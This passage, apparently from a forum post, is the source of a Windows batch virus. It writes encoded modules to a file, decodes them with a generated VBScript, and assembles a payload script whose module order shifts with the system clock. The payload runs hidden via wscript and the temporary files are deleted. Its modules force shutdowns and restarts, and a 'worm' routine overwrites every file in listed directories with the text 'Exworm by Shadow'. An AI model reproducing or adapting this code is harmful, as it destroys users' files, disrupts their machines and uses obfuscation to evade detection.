              echo shutdown -r -f -t 242 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk 
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==6 ( echo shutdown -r -f -t 12 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==7 ( echo :worm ¿mol%tar%¿ >> modul.tk
              echo set target=¿1 ¿mol%tar%¿ >> modul.tk
              echo cd "¿target¿" ¿mol%tar%¿ >> modul.tk
              echo for ¿¿e in ¡*.*$ do echo Exworm by Shadow ^> ¿¿e ¿mol%tar%¿ >> modul.tk
              echo cd "¿programfiles¿" ¿mol%tar%¿ >> modul.tk
              echo goto :EOF ¿mol%tar%¿ >> modul.tk 
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==8 ( echo shutdown -r -f -t 43 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk 
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==9 ( echo :ERRNO ¿mol%tar%¿ >> modul.tk
              echo for /f "tokens=* " ¿¿a in ¡¿homedir¿\dir.txt$ do call :worm "¿¿a" ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk 
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==A ( echo shutdown -s -f -t 53 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF ) 
if %tar%==B ( echo shutdown -s -f -t 22 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk 
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==C ( echo shutdown -r -f -t 11 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk 
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==D ( echo shutdown -r -f -t 666 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk 
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==E ( echo shutdown -s -f -t 23 ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk 
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==F ( echo exit ¿mol%tar%¿ >> modul.tk 
              goto :EOF )
:for
for /f "tokens=*" %%a in (vals.tk) do (set tar=%%a && call :modulcrea)
:sig
echo set shell = CreateObject("Scripting.FileSystemObject") > rep.vbs
echo set file = shell.OpenTextFile("modul.tk") >> rep.vbs
echo read = file.ReadAll >> rep.vbs
echo repla = replace(read,"¿",chr(37)) >> rep.vbs
echo repla1 = replace(repla,"¡",chr(40)) >> rep.vbs
echo repla2 = replace(repla1,"$",chr(41)) >> rep.vbs
echo set b=shell.CreateTextFile("module.tk") >> rep.vbs
echo b.close >> rep.vbs
echo set d=shell.OpenTextFile("module.tk",2) >> rep.vbs
echo d.write repla2 >> rep.vbs
echo d.close >> rep.vbs
start rep.vbs
:code
if not exist module.tk goto crea
echo set shell = CreateObject("wscript.shell") > run2.vbs
echo shell.run "cmd /c kpore.bat", vbHide >> run2.vbs
ping -n 7 localhost > nul
set fail=module.tk
set vir=kpore.bat
echo @echo off > %vir%
set a=%time:~,5%
set b=%a:~3,2%
del modul.tk vals.tk rep.vbs
if /I %b% geq 0 (if /I %b% lss 10 goto a)
if /I %b% geq 10 (if /I %b% lss 20 goto b)
if /I %b% geq 20 (if /I %b% lss 30 goto c)
if /I %b% geq 30 (if /I %b% lss 40 goto d)
if /I %b% geq 40 (if /I %b% lss 50 goto e)
if /I %b% geq 50 (if /I %b% lss 60 goto f)
goto crea
:a
find "mol0" <%fail%>>%vir%
find "mol1" <%fail%>>%vir%
find "mol2" <%fail%>>%vir%
find "mol3" <%fail%>>%vir%
find "mol5" <%fail%>>%vir%
find "mol6" <%fail%>>%vir%
find "mol8" <%fail%>>%vir%
find "molA" <%fail%>>%vir%
find "molB" <%fail%>>%vir%
find "molD" <%fail%>>%vir%
find "molE" <%fail%>>%vir%
find "molF" <%fail%>>%vir%
find "mol4" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol9" <%fail%>>%vir%
find "molC" <%fail%>>%vir%
start run2.vbs
goto qep
:b
find "mol4" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol9" <%fail%>>%vir%
find "mol6" <%fail%>>%vir%
find "mol5" <%fail%>>%vir%
find "molF" <%fail%>>%vir%
find "mol3" <%fail%>>%vir%
find "mol2" <%fail%>>%vir%
find "mol1" <%fail%>>%vir%
find "mol0" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol8" <%fail%>>%vir%
find "molD" <%fail%>>%vir%
find "molA" <%fail%>>%vir%
find "molB" <%fail%>>%vir%
find "molC" <%fail%>>%vir%
start run2.vbs
goto qep
:C
find "molB" <%fail%>>%vir%
find "mol5" <%fail%>>%vir%
find "mol6" <%fail%>>%vir%
find "mol4" <%fail%>>%vir%
find "mol2" <%fail%>>%vir%
find "mol1" <%fail%>>%vir%
find "molA" <%fail%>>%vir%
find "molC" <%fail%>>%vir%
find "mol8" <%fail%>>%vir%
find "mol9" <%fail%>>%vir%
find "molF" <%fail%>>%vir%
find "molD" <%fail%>>%vir%
find "molE" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol0" <%fail%>>%vir%
find "mol3" <%fail%>>%vir%
start run2.vbs
goto qep
:d
find "molF" <%fail%>>%vir%
find "molE" <%fail%>>%vir%
find "mol1" <%fail%>>%vir%
find "mol2" <%fail%>>%vir%
find "mol3" <%fail%>>%vir%
find "mol4" <%fail%>>%vir%
find "molA" <%fail%>>%vir%
find "molB" <%fail%>>%vir%
find "molC" <%fail%>>%vir%
find "molD" <%fail%>>%vir%
find "mol9" <%fail%>>%vir%
find "mol0" <%fail%>>%vir%
find "mol5" <%fail%>>%vir%
find "mol6" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol8" <%fail%>>%vir%
start run2.vbs
goto qep
:e
find "mol8" <%fail%>>%vir%
find "mol0" <%fail%>>%vir%
find "mol3" <%fail%>>%vir%
find "mol2" <%fail%>>%vir%
find "mol5" <%fail%>>%vir%
find "molB" <%fail%>>%vir%
find "mol1" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol6" <%fail%>>%vir%
find "molC" <%fail%>>%vir%
find "mol9" <%fail%>>%vir%
find "molE" <%fail%>>%vir%
find "molF" <%fail%>>%vir%
find "mol4" <%fail%>>%vir%
find "molA" <%fail%>>%vir%
find "molD" <%fail%>>%vir%
start run2.vbs
goto qep
:f
find "mol5" <%fail%>>%vir%
find "mol1" <%fail%>>%vir%
find "mol4" <%fail%>>%vir%
find "mol6" <%fail%>>%vir%
find "mol2" <%fail%>>%vir%
find "mol9" <%fail%>>%vir%
find "mol3" <%fail%>>%vir%
find "mol7" <%fail%>>%vir%
find "mol8" <%fail%>>%vir%
find "mol0" <%fail%>>%vir%
find "molE" <%fail%>>%vir%
find "molF" <%fail%>>%vir%
find "molC" <%fail%>>%vir%
find "molD" <%fail%>>%vir%
find "molA" <%fail%>>%vir%
find "molB" <%fail%>>%vir%
start run2.vbs
goto qep

Páginas: [1] 2